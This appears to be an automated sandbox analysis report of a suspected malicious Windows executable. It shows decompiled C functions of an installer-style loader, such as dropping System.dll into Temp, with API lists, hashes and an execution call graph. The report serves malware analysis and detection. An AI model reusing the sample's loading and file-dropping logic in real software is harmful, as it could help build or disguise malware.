                                                                                                                • Instruction Fuzzy Hash: F611C2B1B005109BC730DF15D880A73767DEB84716369413BE94167391C77EAE028E58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404E54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404E54(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420488 != _t22) {
							 *0x420488 = _t22;
							E00405B66(0x4204a0, 0x424000);
							E00405AC4(0x424000, _t22);
							E0040140B(6);
							E00405B66(0x424000, 0x4204a0);
						}
						L11:
						return CallWindowProcA( *0x420490, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004047D3(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403F64(0x413);
				return 0;
			}




                                                                                                                0x00404e60
                                                                                                                0x00404e85
                                                                                                                0x00404ea5
                                                                                                                0x00404ea8
                                                                                                                0x00404eab
                                                                                                                0x00404ec2
                                                                                                                0x00404ec8
                                                                                                                0x00404ecf
                                                                                                                0x00404ed6
                                                                                                                0x00404edd
                                                                                                                0x00404ee2
                                                                                                                0x00404ee8
                                                                                                                0x00000000
                                                                                                                0x00404ef8
                                                                                                                0x00404e92
                                                                                                                0x00404ee5
                                                                                                                0x00404ee5
                                                                                                                0x00000000
                                                                                                                0x00404ee5
                                                                                                                0x00404e9e
                                                                                                                0x00404ea0
                                                                                                                0x00000000
                                                                                                                0x00404ea0
                                                                                                                0x00404e66
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00404e6d
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • IsWindowVisible.USER32(?), ref: 00404E8A
                                                                                                                • CallWindowProcA.USER32 ref: 00404EF8
                                                                                                                  • Part of subcall function 00403F64: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403F76
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                • String ID:
                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                • Opcode ID: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
                                                                                                                • Instruction ID: 62f3a1a08e098275047049d4f9968a6b4933f6b7f921e7009373277d82a30415
                                                                                                                • Opcode Fuzzy Hash: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
                                                                                                                • Instruction Fuzzy Hash: D1116D71900208BBDB21AF52DC4499B3669FB84369F00803BF6047A2E2C37C5A519BAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004024BE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004024BE(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029F6(0x11));
				} else {
					E004029D9(1);
					 *0x409f70 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405ADD(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsyA3E4.tmp\System.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                                                                0x004024be
                                                                                                                0x004024be
                                                                                                                0x004024c1
                                                                                                                0x004024dc
                                                                                                                0x004024c3
                                                                                                                0x004024c5
                                                                                                                0x004024ca
                                                                                                                0x004024d1
                                                                                                                0x004024e3
                                                                                                                0x0040265c
                                                                                                                0x0040265c
                                                                                                                0x004024e9
                                                                                                                0x004024fb
                                                                                                                0x004015a6
                                                                                                                0x004015a8
                                                                                                                0x00000000
                                                                                                                0x004015ae
                                                                                                                0x004015a8
                                                                                                                0x0040288e
                                                                                                                0x0040289a

                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
                                                                                                                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 004024FB
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp\System.dll, xrefs: 004024CA, 004024EF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWritelstrlen
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp\System.dll
                                                                                                                • API String ID: 427699356-2708510609
                                                                                                                • Opcode ID: 02a15bd42c28bed1fb8554f3d16374f042fc662dbffd218bbabce7ee12e12458
                                                                                                                • Instruction ID: 2c1f07a632d72534084a5ac00d75746702f795d1104bf50e8da4b719a2e94720
                                                                                                                • Opcode Fuzzy Hash: 02a15bd42c28bed1fb8554f3d16374f042fc662dbffd218bbabce7ee12e12458
                                                                                                                • Instruction Fuzzy Hash: BCF08972A44245FFD710EBB19E49EAF7668DB00348F14443BB142F51C2D6FC5982976D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040361A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040361A() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f45c;
				_t3 = E004035FF(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f45c =  *0x41f45c & 0x00000000;
				return _t3;
			}







                                                                                                                0x0040361b
                                                                                                                0x00403623
                                                                                                                0x0040362a
                                                                                                                0x0040362d
                                                                                                                0x0040362d
                                                                                                                0x0040362f
                                                                                                                0x00403634
                                                                                                                0x0040363b
                                                                                                                0x00403641
                                                                                                                0x00403645
                                                                                                                0x00403646
                                                                                                                0x0040364e

                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,00000000,74B5F560,004035F1,00000000,0040342D,00000000), ref: 00403634
                                                                                                                • GlobalFree.KERNEL32 ref: 0040363B
                                                                                                                Strings
                                                                                                                • "C:\Users\user\Desktop\UGGJ4NnzFz.exe" , xrefs: 0040362C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                • String ID: "C:\Users\user\Desktop\UGGJ4NnzFz.exe"
                                                                                                                • API String ID: 1100898210-3304980134
                                                                                                                • Opcode ID: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
                                                                                                                • Instruction ID: 07f203a12dc211ea1540440f4769086933c1ddaa55d0411da1bb29b7fd771b51
                                                                                                                • Opcode Fuzzy Hash: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
                                                                                                                • Instruction Fuzzy Hash: 8FE08C32804420ABC6216F55EC0579A7768AB48B22F028536E900BB3A083743C464BDC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004056A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004056A0(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                                                0x004056a1
                                                                                                                0x004056ab
                                                                                                                0x004056ad
                                                                                                                0x004056b4
                                                                                                                0x004056bc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004056bc
                                                                                                                0x004056be
                                                                                                                0x004056c3

                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\UGGJ4NnzFz.exe,C:\Users\user\Desktop\UGGJ4NnzFz.exe,80000000,00000003), ref: 004056A6
                                                                                                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\UGGJ4NnzFz.exe,C:\Users\user\Desktop\UGGJ4NnzFz.exe,80000000,00000003), ref: 004056B4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                • API String ID: 2709904686-1669384263
                                                                                                                • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                                • Instruction ID: 6658d1b0ab05e5211e75f0b74aef41c49d7b43cb9628f8e009f88ad9fa15a52a
                                                                                                                • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                                • Instruction Fuzzy Hash: C5D0A772409DB02EF30352108C04B8F7A98CF17300F0948A2E440E21D0C27C5C818FFD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 737510E0, Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E737510E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x7375405c = _a8;
				 *0x73754060 = _a16;
				 *0x73754064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73754038, E73751556, _t52);
				_t43 =  *0x7375405c +  *0x7375405c * 4 << 2;
				_t17 = E7375123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E73751266(E737512AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E737512D1( *_t55 - 0x30, E7375123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x73754030;
								 *0x73754030 = _t31;
								E73751508(_t31 + 4,  *0x73754064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x73754030;
							if( *0x73754030 != 0) {
								E73751508( *0x73754064, _t34 + 4, _t43);
								_t37 =  *0x73754030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x73754030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}


















                                                                                                                0x737510e7
                                                                                                                0x737510ef
                                                                                                                0x73751103
                                                                                                                0x7375110b
                                                                                                                0x73751116
                                                                                                                0x73751119
                                                                                                                0x73751121
                                                                                                                0x73751124
                                                                                                                0x73751126
                                                                                                                0x737511c4
                                                                                                                0x737511d0
                                                                                                                0x7375112c
                                                                                                                0x7375112d
                                                                                                                0x7375112d
                                                                                                                0x73751130
                                                                                                                0x73751131
                                                                                                                0x73751134
                                                                                                                0x73751203
                                                                                                                0x73751206
                                                                                                                0x7375119e
                                                                                                                0x737511a4
                                                                                                                0x737511ac
                                                                                                                0x737511b1
                                                                                                                0x737511b4
                                                                                                                0x00000000
                                                                                                                0x737511b4
                                                                                                                0x73751209
                                                                                                                0x7375120a
                                                                                                                0x73751186
                                                                                                                0x7375118c
                                                                                                                0x73751194
                                                                                                                0x00000000
                                                                                                                0x73751194
                                                                                                                0x73751152
                                                                                                                0x73751153
                                                                                                                0x7375115b
                                                                                                                0x73751168
                                                                                                                0x73751170
                                                                                                                0x73751179
                                                                                                                0x7375117e
                                                                                                                0x7375117e
                                                                                                                0x00000000
                                                                                                                0x73751153
                                                                                                                0x7375113a
                                                                                                                0x737511d1
                                                                                                                0x737511d1
                                                                                                                0x737511d8
                                                                                                                0x737511e5
                                                                                                                0x737511ea
                                                                                                                0x737511ef
                                                                                                                0x737511f5
                                                                                                                0x737511fb
                                                                                                                0x737511fb
                                                                                                                0x00000000
                                                                                                                0x737511d8
                                                                                                                0x73751140
                                                                                                                0x73751143
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751149
                                                                                                                0x7375114c
                                                                                                                0x7375119b
                                                                                                                0x00000000
                                                                                                                0x7375119b
                                                                                                                0x7375114f
                                                                                                                0x73751150
                                                                                                                0x73751183
                                                                                                                0x00000000
                                                                                                                0x73751183
                                                                                                                0x00000000
                                                                                                                0x737511ba
                                                                                                                0x737511ba
                                                                                                                0x00000000
                                                                                                                0x737511c3

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.221701988.0000000073751000.00000020.00020000.sdmp, Offset: 73750000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.221693886.0000000073750000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.221717346.0000000073753000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.221724453.0000000073755000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_73750000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1780285237-0
                                                                                                                • Opcode ID: 221320d8b9f422cf1b650d6a96f7e4081ca984872c3473ba484b355ca850635f
                                                                                                                • Instruction ID: f5ba27d3f3908965827867e7f19bc1e4d3a10e20e1b0676ee232685623ded063
                                                                                                                • Opcode Fuzzy Hash: 221320d8b9f422cf1b650d6a96f7e4081ca984872c3473ba484b355ca850635f
                                                                                                                • Instruction Fuzzy Hash: DE3181B350425AAFEF09EF66DA49B267FF9EB05252B384595F84EC7250D639D800CB20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004057B2, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004057B2(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                                                                0x004057be
                                                                                                                0x004057c0
                                                                                                                0x004057e8
                                                                                                                0x004057cd
                                                                                                                0x004057d2
                                                                                                                0x004057dd
                                                                                                                0x00000000
                                                                                                                0x004057fa
                                                                                                                0x004057e6
                                                                                                                0x004057e6
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057D2
                                                                                                                • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004057E0
                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 190613189-0
                                                                                                                • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                                • Instruction ID: 042c172281cf084eebf1820456e7eb749b121a10276c912c68532230cfd8689c
                                                                                                                • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                                • Instruction Fuzzy Hash: BBF0A736249D51DBC2029B295C44E6FBEA4EF95355F14057EF440F3180D335AC11ABBB
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Analysis Process: UGGJ4NnzFz.exe PID: 5520 Parent PID: 4884 UGGJ4NnzFz.exeCOMMON

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:4.3%
                                                                                                                Dynamic/Decrypted Code Coverage:2.8%
                                                                                                                Signature Coverage:5.7%
                                                                                                                Total number of Nodes:576
                                                                                                                Total number of Limit Nodes:69

                                                                                                                Graph

                                                                                                                execution_graph 31413 41d050 31414 41d05b 31413->31414 31416 4197d0 31413->31416 31417 4197f6 31416->31417 31428 408b40 31417->31428 31419 419802 31427 419849 31419->31427 31436 40d150 31419->31436 31421 419817 31424 41982c 31421->31424 31484 418510 31421->31484 31448 40a5f0 31424->31448 31425 41983b 31426 418510 2 API calls 31425->31426 31426->31427 31427->31414 31487 408a90 31428->31487 31430 408b4d 31431 408b54 31430->31431 31499 408a30 31430->31499 31431->31419 31437 40d17c 31436->31437 31908 409ff0 31437->31908 31439 40d18e 31912 40d060 31439->31912 31442 40d1c1 31445 40d1d2 31442->31445 31447 4182f0 2 API calls 31442->31447 31443 40d1a9 31444 40d1b4 31443->31444 31446 4182f0 2 API calls 31443->31446 31444->31421 31445->31421 31446->31444 31447->31445 31449 40a615 31448->31449 31450 409ff0 LdrLoadDll 31449->31450 31451 40a66c 31450->31451 31931 409c70 31451->31931 31453 40a692 31483 40a8e3 31453->31483 31940 413380 31453->31940 31455 40a6d7 31455->31483 31943 4079b0 31455->31943 31457 40a71b 31457->31483 31950 418360 31457->31950 31461 40a771 31462 40a778 31461->31462 31962 417e70 31461->31962 31463 419c80 2 API calls 31462->31463 31465 40a785 31463->31465 31465->31425 31467 40a7c2 31468 419c80 2 API calls 31467->31468 31469 40a7c9 31468->31469 31469->31425 31470 40a7d2 31471 40d1e0 3 API calls 31470->31471 31472 40a846 31471->31472 31472->31462 31473 40a851 31472->31473 31474 419c80 2 API calls 31473->31474 31475 40a875 31474->31475 31967 417ec0 31475->31967 31478 417e70 2 API calls 31479 40a8b0 31478->31479 31479->31483 31972 417c80 31479->31972 31482 418510 2 API calls 31482->31483 31483->31425 31485 418dc0 LdrLoadDll 31484->31485 31486 41852f ExitProcess 31485->31486 31486->31424 31488 408aa3 31487->31488 31538 416a30 LdrLoadDll 31487->31538 31518 4168e0 31488->31518 31491 408ab6 31491->31430 31492 408aac 31492->31491 31521 419110 31492->31521 31494 408af3 31494->31491 31532 4088b0 31494->31532 31496 408b13 31539 408300 LdrLoadDll 31496->31539 31498 408b25 31498->31430 31500 408a4a 31499->31500 31501 419400 LdrLoadDll 31499->31501 31883 419400 31500->31883 31501->31500 31504 419400 LdrLoadDll 31505 408a71 31504->31505 31506 40cf50 31505->31506 31507 40cf69 31506->31507 31891 409e70 31507->31891 31509 40cf7c 31895 418040 31509->31895 31513 40cfa0 31517 40cfcd 31513->31517 31901 4180c0 31513->31901 31514 4182f0 2 API calls 31516 408b65 31514->31516 31516->31419 31517->31514 31540 418460 31518->31540 31522 419129 31521->31522 31553 413a30 31522->31553 31524 419141 31525 41914a 31524->31525 31592 418f50 31524->31592 31525->31494 31527 41915e 31527->31525 31610 417d60 31527->31610 31535 4088ca 31532->31535 31861 406e00 31532->31861 31534 4088d1 31534->31496 31535->31534 31874 4070c0 31535->31874 31538->31488 31539->31498 31541 4168f5 31540->31541 31543 418dc0 31540->31543 31541->31492 31544 418dd0 31543->31544 31545 418df2 31543->31545 31547 413e30 31544->31547 31545->31541 31548 413e3e 31547->31548 31549 413e4a 31547->31549 31548->31549 31552 4142b0 LdrLoadDll 31548->31552 31549->31545 31551 413f9c 31551->31545 31552->31551 31554 413d65 31553->31554 31555 413a44 31553->31555 31554->31524 31555->31554 31618 417ab0 31555->31618 31558 413b70 31622 4181c0 31558->31622 31559 413b53 31679 4182c0 LdrLoadDll 31559->31679 31562 413b5d 31562->31524 31563 413b97 31564 419c80 2 API calls 31563->31564 31566 413ba3 31564->31566 31565 413d29 31567 4182f0 2 API calls 31565->31567 31566->31562 31566->31565 31568 413d3f 31566->31568 31572 413c32 31566->31572 31569 413d30 31567->31569 31688 413770 LdrLoadDll NtReadFile NtClose 31568->31688 31569->31524 31571 413d52 31571->31524 31573 413c99 31572->31573 31575 413c41 31572->31575 31573->31565 31574 413cac 31573->31574 31681 418140 31574->31681 31577 413c46 31575->31577 31578 413c5a 31575->31578 31680 413630 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31577->31680 31579 413c77 31578->31579 31580 413c5f 31578->31580 31579->31569 31637 4133f0 31579->31637 31625 4136d0 31580->31625 31585 413c50 31585->31524 31586 413c6d 31586->31524 31588 413d0c 31685 4182f0 31588->31685 31589 413c8f 31589->31524 31591 413d18 31591->31524 31593 418f61 31592->31593 31594 418f73 31593->31594 31706 419c00 31593->31706 31594->31527 31596 418f94 31709 413040 31596->31709 31598 418fe0 31598->31527 31599 418fb7 31599->31598 31600 413040 3 API calls 31599->31600 31601 418fd9 31600->31601 31601->31598 31734 414370 31601->31734 31603 41907a 31744 418bd0 31603->31744 31604 41906a 31604->31603 31828 418d60 LdrLoadDll 31604->31828 31607 4190a8 31823 417d20 31607->31823 31611 417d7c 31610->31611 31612 418dc0 LdrLoadDll 31610->31612 31855 9d967a 31611->31855 31612->31611 31613 417d97 31615 419c80 31613->31615 31858 4184d0 31615->31858 31617 4191b9 31617->31494 31619 417ac6 31618->31619 31620 418dc0 LdrLoadDll 31619->31620 31621 413b24 31620->31621 31621->31558 31621->31559 31621->31562 31623 418dc0 LdrLoadDll 31622->31623 31624 4181dc NtCreateFile 31623->31624 31624->31563 31626 4136ec 31625->31626 31627 418140 LdrLoadDll 31626->31627 31628 41370d 31627->31628 31629 413714 31628->31629 31630 413728 31628->31630 31632 4182f0 2 API calls 31629->31632 31631 4182f0 2 API calls 31630->31631 31633 413731 31631->31633 31634 41371d 31632->31634 31689 419e90 LdrLoadDll RtlAllocateHeap 31633->31689 31634->31586 31636 41373c 31636->31586 31638 41343b 31637->31638 31639 41346e 31637->31639 31641 418140 LdrLoadDll 31638->31641 31640 4135b9 31639->31640 31644 41348a 31639->31644 31642 418140 LdrLoadDll 31640->31642 31643 413456 31641->31643 31649 4135d4 31642->31649 31645 4182f0 2 API calls 31643->31645 31646 418140 LdrLoadDll 31644->31646 31647 41345f 31645->31647 31648 4134a5 31646->31648 31647->31589 31651 4134c1 31648->31651 31652 4134ac 31648->31652 31702 418180 LdrLoadDll 31649->31702 31655 4134c6 31651->31655 31656 4134dc 31651->31656 31654 4182f0 2 API calls 31652->31654 31653 41360e 31657 4182f0 2 API calls 31653->31657 31658 4134b5 31654->31658 31659 4182f0 2 API calls 31655->31659 31664 4134e1 31656->31664 31690 419e50 31656->31690 31660 413619 31657->31660 31658->31589 31661 4134cf 31659->31661 31660->31589 31661->31589 31673 4134f3 31664->31673 31693 418270 31664->31693 31665 413547 31666 41355e 31665->31666 31701 418100 LdrLoadDll 31665->31701 31668 413565 31666->31668 31669 41357a 31666->31669 31671 4182f0 2 API calls 31668->31671 31670 4182f0 2 API calls 31669->31670 31672 413583 31670->31672 31671->31673 31674 4135af 31672->31674 31696 419a50 31672->31696 31673->31589 31674->31589 31676 41359a 31677 419c80 2 API calls 31676->31677 31678 4135a3 31677->31678 31678->31589 31679->31562 31680->31585 31682 418dc0 LdrLoadDll 31681->31682 31683 413cf4 31682->31683 31684 418180 LdrLoadDll 31683->31684 31684->31588 31686 41830c NtClose 31685->31686 31687 418dc0 LdrLoadDll 31685->31687 31686->31591 31687->31686 31688->31571 31689->31636 31692 419e68 31690->31692 31703 418490 31690->31703 31692->31664 31694 418dc0 LdrLoadDll 31693->31694 